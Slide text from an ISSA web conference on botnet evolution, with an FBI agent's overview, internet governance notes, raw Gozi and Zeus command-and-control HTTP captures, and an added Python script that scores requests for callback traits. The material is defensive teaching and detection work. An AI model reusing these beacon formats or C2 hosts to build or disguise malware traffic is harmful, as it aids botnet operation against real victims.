Sponsored by:
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee
Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI
Closing Comments
UNCLASSIFIED
Agenda
What is a botnet?
How are botnets created?
Why are botnets created?
Basic structure of a botnet
Taking down a botnet
How botnets are evolving
Botnets in the news
Questions
What is a botnet?
A network of compromised computers (robots/bots)
Controlled by a bot master / herder
Used to carry out various illegal activities
Services are often sold to other criminal elements
Victims
Malware loaded onto victim machines
Done through exploits and/or social engineering
Manage
Continually update software / instructions to bots
Maintain statistics for the botnet
Basic Structure
Botnets evolving
[Diagram: Bot Master / Herder -> C&C Servers -> Proxies -> Victims]
Botnets evolving
[Diagram: Bot Master / Herder -> Proxies -> C&C Servers -> Proxies -> Victims]
Questions?
Today's Agenda
Understanding the shift from conventional to modern malware, and the resultant hosting needs
Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.
Callback Server
Other gateway
List-based, signatures
Desktop antivirus
Losing the threat arms race
Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.
IANA -> RIRs
RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
RIRs -> LIRs
LIRs are generally data centers and ISPs
ICANNt do anything!
ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn't violate the contract. These contracts have no mention of content.
Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
Large pushback when someone even suspects they are trying to take an authoritative stance on something.
Gozi
POST /cgi-bin/forms.cgi HTTP/1.0
Content-Type: multipart/form-data; boundary=-------------------------139b9b3139b9b3139b9b3
User-Agent: IE
Host: 91.216.215.130
Content-Length: 453
Pragma: no-cache
Zeus
POST /xed/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
Host: schastlivieiveselierebyta0001.com
Content-Length: 329
Connection: Keep-Alive
Cache-Control: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: www.promohru.in
Pragma: no-cache
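The Gozi and Zeus captures above show what a callback looks like on the wire: a bare IP in the Host header, a User-Agent that no real browser sends ("IE", "Microsoft Internet Explorer"), HTTP/1.0 request lines, a gate.php handler and a query string full of status fields (guid, ver, stat, md5). The script below is an added example, not code from the slides, FireEye or the FBI: it parses raw HTTP requests and scores them against those traits so an analyst can triage proxy captures. The three malicious requests are the ones shown on the slides; the benign request, the rule set, the threshold and the names parse_request, score_request and triage are all constructed assumptions for this illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# The three callback captures below are reproduced from the slides (Gozi and
# Zeus); the benign request further down is a constructed comparison case.
GOZI_POST = (
    "POST /cgi-bin/forms.cgi HTTP/1.0\r\n"
    "Content-Type: multipart/form-data; "
    "boundary=-------------------------139b9b3139b9b3139b9b3\r\n"
    "User-Agent: IE\r\n"
    "Host: 91.216.215.130\r\n"
    "Content-Length: 453\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
)
ZEUS_POST = (
    "POST /xed/gate.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
    "Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
    ".NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)\r\n"
    "Host: schastlivieiveselierebyta0001.com\r\n"
    "Content-Length: 329\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
ZEUS_GET = (
    "GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE"
    "&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0\r\n"
    "User-Agent: Microsoft Internet Explorer\r\n"
    "Host: www.promohru.in\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
)
BENIGN_GET = (  # constructed for comparison, not from the slides
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)

# Status parameters seen in the Zeus beacon on the slide.
BEACON_KEYS = {"guid", "ver", "stat", "md5"}
# Handler path seen in both Zeus captures; a hypothetical watchlist entry,
# not a vendor signature.
GATE_RE = re.compile(r"/gate\.php$")


def parse_request(raw):
    """Split a raw HTTP request into method, target, version, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def score_request(req):
    """Return (score, reasons); every matched heuristic adds one point."""
    reasons = []
    h = req["headers"]
    host = h.get("host", "")
    ua = h.get("user-agent", "")
    parts = urlsplit(req["target"])
    query = parse_qs(parts.query)

    try:  # Host header carrying a bare IP instead of a hostname (Gozi capture)
        ipaddress.ip_address(host)
        reasons.append("Host header is a bare IP address")
    except ValueError:
        pass
    if not ua.startswith("Mozilla/"):  # "IE", "Microsoft Internet Explorer"
        reasons.append("User-Agent does not look like a real browser")
    if req["version"] == "HTTP/1.0":
        reasons.append("HTTP/1.0 request line")
    if GATE_RE.search(parts.path):
        reasons.append("request to a watchlisted gate handler path")
    if len(BEACON_KEYS & set(query)) >= 2:
        reasons.append("beacon-style status parameters in query string")
    if req["method"] == "POST" and "referer" not in h:
        reasons.append("form POST without a Referer header")
    return len(reasons), reasons


def triage(captures, threshold=2):
    """Score (label, raw_request) pairs; returns label -> (flagged, score, reasons)."""
    result = {}
    for label, raw in captures:
        score, reasons = score_request(parse_request(raw))
        result[label] = (score >= threshold, score, reasons)
    return result


if __name__ == "__main__":
    captures = [("gozi_post", GOZI_POST), ("zeus_post", ZEUS_POST),
                ("zeus_get", ZEUS_GET), ("benign_get", BENIGN_GET)]
    for label, (flagged, score, reasons) in triage(captures).items():
        print(f"{label:11s} flagged={flagged} score={score} {'; '.join(reasons)}")
```

Each rule on its own is weak (plenty of legitimate tools send HTTP/1.0 or a terse User-Agent), which is why the triage function only flags a request when two or more traits line up; in practice the threshold and the watchlist would be tuned against the organisation's own proxy logs, and a hit is a lead for the analyst, not a verdict.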
www.fireeye.com
For late-breaking malware research and news:
blog.fireeye.com
FireEye, Inc. Confidential
Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference
CPE Credit
Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.